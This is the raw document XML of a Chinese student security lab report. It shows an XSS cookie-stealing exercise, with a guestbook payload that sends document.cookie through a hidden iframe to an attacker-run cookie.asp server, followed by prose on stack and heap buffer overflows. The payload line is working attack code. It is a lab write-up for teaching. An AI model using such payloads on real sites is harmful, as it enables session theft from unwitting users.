        <w:t>，所以说这些显示的cookie信息都是在被攻击者可见的，一是攻击者看不到这个cookie信息，二是被攻击者会发现攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD4C7B" w:rsidRDefault="00FD4C7B" w:rsidP="00516E0E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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B46A76">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>常见的方法是使用xss平台，将盗取的cookie发送到制定的平台服务器，xss平台会有一些邮件提醒机制，当然，如果你有自己的服务器的话，也可以直接发送到自己的服务器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F028F7" w:rsidRPr="00B46A76" w:rsidRDefault="00F028F7" w:rsidP="00B46A76">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在攻击机上使用提供的页面搭建WEB服务器，以便保存浏览用户的cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5A54" w:rsidRDefault="005D5A54" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480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590F9A7E" wp14:editId="41117D29">
            <wp:extent cx="3750310" cy="36493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766" t="6810"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3750310" cy="364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A54" w:rsidRDefault="005D5A54" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="48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搭建IIS服务器过程中应注意如下几点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5A54" w:rsidRDefault="005D5A54" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr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在Web服务扩展中允许Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server Pages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5A54" w:rsidRDefault="005D5A54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6979A3A8" wp14:editId="64C03EBE">
            <wp:extent cx="3218815" cy="22574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351" t="16154"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3259108" cy="228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A54" w:rsidRDefault="005D5A54" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr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默认网站-属性-文档中添加index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>.asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容页</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5A54" w:rsidRDefault="005D5A54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45A7812C" wp14:editId="5DA7F1FF">
            <wp:extent cx="3750310" cy="36417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8895"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3750310" cy="364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A54" w:rsidRDefault="005D5A54" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5A54">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>在：C:\tools\跨站脚本攻击\中的cookies文件夹属性-安全-组或用户名称（G）-添加-高级-立即查找中找到IUSR_BJHIT-YXI7NEFU8用户，选择并确定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5A54" w:rsidRDefault="005D5A54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2E7B0C46" wp14:editId="794DB018">
            <wp:extent cx="4807585" cy="30549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849" t="14181"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4807585" cy="3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A54" w:rsidRDefault="005D5A54" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5A54">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>给IUSR_BJHIT-YXI7NEFU8用户写入权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5A54" w:rsidRDefault="005D5A54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2ABD6D43" wp14:editId="46229FD7">
            <wp:extent cx="3121660" cy="37744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814" t="3176"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3121660" cy="377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A54" w:rsidRDefault="005D5A54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返回</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00277268">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          </w:rPr>
          <w:t>http://10.1.1.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，继续添加留言，包含以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5A54" w:rsidRDefault="005D5A54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 w:rsidRPr="005D5A54">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write("&lt;iframe width=0 height=0 src='http://10.1.1.</w:t>
      </w:r>
      <w:r w:rsidR="00B46A76">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5A54">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>/cookie.asp?cookie="+document.cookie+"'&gt;&lt;/iframe&gt;");&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB23C6" w:rsidRDefault="00AB23C6" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F3C9F82" wp14:editId="5020AD77">
            <wp:extent cx="3152775" cy="1038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881" t="56892" r="9342" b="5296"/>
                    <a:stretch/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3C6" w:rsidRDefault="00AB23C6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打开本地页面，查看接收浏览用户的cookie接收情况：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB23C6" w:rsidRDefault="00AB23C6" w:rsidP="005D5A54">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3391D9AF" wp14:editId="2BD4451E">
            <wp:extent cx="3762375" cy="533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65" t="11559" r="27401" b="72259"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="37623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D02" w:rsidRPr="00AB23C6" w:rsidRDefault="00152D02" w:rsidP="00152D02">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="00A3544E">
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>分析与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3EC1" w:rsidRDefault="00AB23C6" w:rsidP="00FF3EC1">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312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跨站脚本攻击原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4652" w:rsidRDefault="00232FE4" w:rsidP="00EF4652">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>Xss形成的主要原因是网站对用户的输入过滤不严格，没有过滤掉一些敏感的词，比如script，等，攻击者利用留言方式将js脚本代码写入到网站的前端，并使浏览器执行js代码。可以分为反射型和存储型漏洞，反射型主要是在url后面附加xss利用代码，然后发送给受害者，使其点击并被攻击</w:t>
      </w:r>
      <w:r w:rsidR="006F0A87">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>，攻击者一般用编码使受害者看不出来，但是url过长也会引起被攻击者的怀疑。反射型xss，是将留言区的js代码存储写入到数据库中，当任意用户访问网站时，xss都会触发，从而造成威胁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3EC1" w:rsidRDefault="00FF3EC1" w:rsidP="00FF3EC1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个人体会：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3EC1" w:rsidRDefault="00FF3EC1" w:rsidP="00FF3EC1">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/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 w:rsidR="006F0A87">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个实验比较基础，使我们初步认识了什么是真正的xss，并且怎么对其进行利用。</w:t>
      </w:r>
      <w:r w:rsidR="006F0A87">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="006F0A87">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ss的危害还是比较大的，但是同时也相对比较容易预防，需要网站开发人员有良好的基本过滤编程素质。原来的sql注入和xss霸占渗透漏洞排行榜前两名很多年，但是随着技术的发展，大家都对他们有了一定的防范，xss和sql注入已经无法登顶。</w:t>
      </w:r>
      <w:r w:rsidR="006F0A87">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>但是现在仍然是主流的网站漏洞，还有相当一部分的网站存在着xss，可能被盗取cookie，恶意弹窗（恶作剧等）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4652" w:rsidRDefault="00EF4652" w:rsidP="00FF3EC1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF4652" w:rsidRDefault="00EF4652" w:rsidP="00FF3EC1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF4652" w:rsidRDefault="00EF4652" w:rsidP="00FF3EC1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3EC1" w:rsidRDefault="00FF3EC1" w:rsidP="00FF3EC1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:t>1-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：栈和堆的溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00306226" w:rsidRDefault="00306226" w:rsidP="00AF1A4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306226">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>分析缓冲区溢出的原理。根据这2个程序，详细说明基于堆和栈的缓冲区溢出的原理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22960" w:rsidRDefault="00AF1A4C" w:rsidP="00AF1A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AF1A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>缓冲区溢出原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF1A4C" w:rsidRDefault="00D22960" w:rsidP="00D22960">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLineChars="0" w:firstLine="495"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi"/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr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通过往程序的</w:t>
      </w:r>
      <w:hyperlink r:id="rId24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缓冲区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写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的</w:t>
      </w:r>
      <w:hyperlink r:id="rId25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堆栈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，造成程序崩溃或使程序转而执行其它指令，以达到攻击的目的。造成</w:t>
      </w:r>
      <w:hyperlink r:id="rId26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缓冲区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溢出的原因是程序中没有仔细检查用户输入的参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22960" w:rsidRPr="00D22960" w:rsidRDefault="00D22960" w:rsidP="00D22960">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLineChars="0" w:firstLine="495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缓冲区溢出攻击的目的在于扰乱具有某些特权运行的程序的功能，这样可以使得攻击者取得程序的控制权，如果该程序具有足够的权限，那么整个主机就被控制了。一般而言，攻击者攻击root程序，然后执行类似“exec(sh)”的执行代码来获得</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D22960">
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi"/>
            <w:kern w:val="3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>root权限</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D22960">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi"/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>的shell。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF1A4C" w:rsidRDefault="00770115" w:rsidP="00AF1A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基于栈</w:t>
      </w:r>
      <w:r w:rsidR="00AF1A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的缓冲区溢出的原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B0D8F" w:rsidRPr="007B0D8F" w:rsidRDefault="007B0D8F" w:rsidP="007B0D8F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi" w:hint="eastAsia"/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN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7B0D8F">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi"/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>栈是从高地址向低地址写入的，一般用作函数调用是存放返回地址，一些参数等，而数据的写入是从低地址写向高地址的，这样就可以将栈顶的返回函数和参数覆盖，从而使程序在执行调用函数完毕时调用ret函数时，可以被攻击者利用为返回到任意地址。进而通过nop等操作使ret“降落”在自己的恶意代码上，今儿执行并危害计算机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B0D8F" w:rsidRDefault="00770115" w:rsidP="00AF1A4C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基于堆</w:t>
      </w:r>
      <w:r w:rsidR="00AF1A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的缓冲区溢出的原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF1A4C" w:rsidRPr="00AF1A4C" w:rsidRDefault="007B0D8F" w:rsidP="007B0D8F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="10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   </w:t>
      </w:r>
      <w:r w:rsidRPr="004211A3">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi"/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>在给变量分配堆内存空间时，</w:t>
      </w:r>
      <w:r w:rsidR="004211A3" w:rsidRPr="004211A3">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi"/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>申请到堆的地址在释放之前保持不变，可以利用申请两个堆空间，利用物理地址小的堆地址进行缓冲区溢出，并覆盖后面的大地址的堆空间，达到攻击目的。</w:t>
      </w:r>
      <w:r w:rsidRPr="004211A3">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Lohit Hindi"/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00306226" w:rsidRPr="00AF1A4C" w:rsidRDefault="00306226" w:rsidP="00306226">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="72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852D7E" w:rsidRDefault="00306226" w:rsidP="003062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实验结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00306226" w:rsidRPr="00306226" w:rsidRDefault="00306226" w:rsidP="00306226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1.栈溢出实验</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00306226" w:rsidRDefault="00852D7E" w:rsidP="00306226">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi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37E9D82F" wp14:editId="0A9820FC">
            <wp:extent cx="5274310" cy="1306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7449"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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A4C" w:rsidRDefault="00AF1A4C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</w:p>
    <w:p w:rsidR="00852D7E" w:rsidRDefault="00306226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2.堆溢出实验</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00306226" w:rsidRPr="004211A3" w:rsidRDefault="00852D7E" w:rsidP="00852D7E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"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2BAEEB6" wp14:editId="54AA1D92">
            <wp:extent cx="5274310" cy="1181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226" w:rsidRPr="00421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931" w:rsidRDefault="001D3931" w:rsidP="00FA7206">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D3931" w:rsidRDefault="001D3931" w:rsidP="00FA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931" w:rsidRDefault="001D3931" w:rsidP="00FA7206">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D3931" w:rsidRDefault="001D3931" w:rsidP="00FA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7F406F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F34C3C62"/>
    <w:lvl w:ilvl="0" w:tplc="4E8C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503E2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C06A12FE"/>
    <w:lvl w:ilvl="0" w:tplc="39D88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30339"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB148BC2"/>
    <w:lvl w:ilvl="0" w:tplc="E9CE1C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B74F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2FEE846"/>
    <w:lvl w:ilvl="0" w:tplc="CE96FC3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6466D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EFC4FAC"/>
    <w:lvl w:ilvl="0" w:tplc="DFF2D2CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="630" w:hanging="630"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia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FA0537"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="328EC504"/>
    <w:lvl w:ilvl="0" w:tplc="E8CA3C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C697DA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B39E4EDE"/>
    <w:lvl w:ilvl="0" w:tplc="349E0F06">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="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60D1027E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E02806A8"/>
    <w:lvl w:ilvl="0" w:tplc="A8EE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571B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="026EA6C2"/>
    <w:lvl w:ilvl="0" w:tplc="89C8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A8"/>
    <w:rsid w:val="0000137E"/>
    <w:rsid w:val="00066231"/>
    <w:rsid w:val="000902F0"/>
    <w:rsid w:val="000B6746"/>
    <w:rsid w:val="000D5C47"/>
    <w:rsid w:val="00152D02"/>
    <w:rsid w:val="001D3931"/>
    <w:rsid w:val="00232FE4"/>
    <w:rsid w:val="00243AA6"/>
    <w:rsid w:val="002A1AA8"/>
    <w:rsid w:val="002E0399"/>
    <w:rsid w:val="00306226"/>
    <w:rsid w:val="003351F6"/>
    <w:rsid w:val="00342F44"/>
    <w:rsid w:val="004211A3"/>
    <w:rsid w:val="00516E0E"/>
    <w:rsid w:val="005456BC"/>
    <w:rsid w:val="005D5A54"/>
    <w:rsid w:val="005E2E7A"/>
    <w:rsid w:val="00682E0B"/>
    <w:rsid w:val="006C24C6"/>
    <w:rsid w:val="006F0A87"/>
    <w:rsid w:val="00724331"/>
    <w:rsid w:val="00750498"/>
    <w:rsid w:val="00770115"/>
    <w:rsid w:val="007B0D8F"/>
    <w:rsid w:val="007F1B82"/>
    <w:rsid w:val="00852D7E"/>
    <w:rsid w:val="00880D78"/>
    <w:rsid w:val="008F0C51"/>
    <w:rsid w:val="008F7193"/>
    <w:rsid w:val="00902E02"/>
    <w:rsid w:val="00913A6E"/>
    <w:rsid w:val="009862DA"/>
    <w:rsid w:val="00A325A8"/>
    <w:rsid w:val="00A3544E"/>
    <w:rsid w:val="00A400CF"/>
    <w:rsid w:val="00A449D8"/>
    <w:rsid w:val="00A94E90"/>
    <w:rsid w:val="00AB23C6"/>
    <w:rsid w:val="00AF1A4C"/>
    <w:rsid w:val="00B05C26"/>
    <w:rsid w:val="00B127C6"/>
    <w:rsid w:val="00B46A76"/>
    <w:rsid w:val="00B564C5"/>
    <w:rsid w:val="00D22960"/>
    <w:rsid w:val="00D92ED9"/>
    <w:rsid w:val="00DC4A25"/>
    <w:rsid w:val="00DD51E5"/>
    <w:rsid w:val="00E3311F"/>
    <w:rsid w:val="00E418AD"/>
    <w:rsid w:val="00E87BA9"/>
    <w:rsid w:val="00EE3E9C"/>
    <w:rsid w:val="00EE6DFB"/>
    <w:rsid w:val="00EF4652"/>
    <w:rsid w:val="00F028F7"/>
    <w:rsid w:val="00F813D6"/>
    <w:rsid w:val="00F91A01"/>
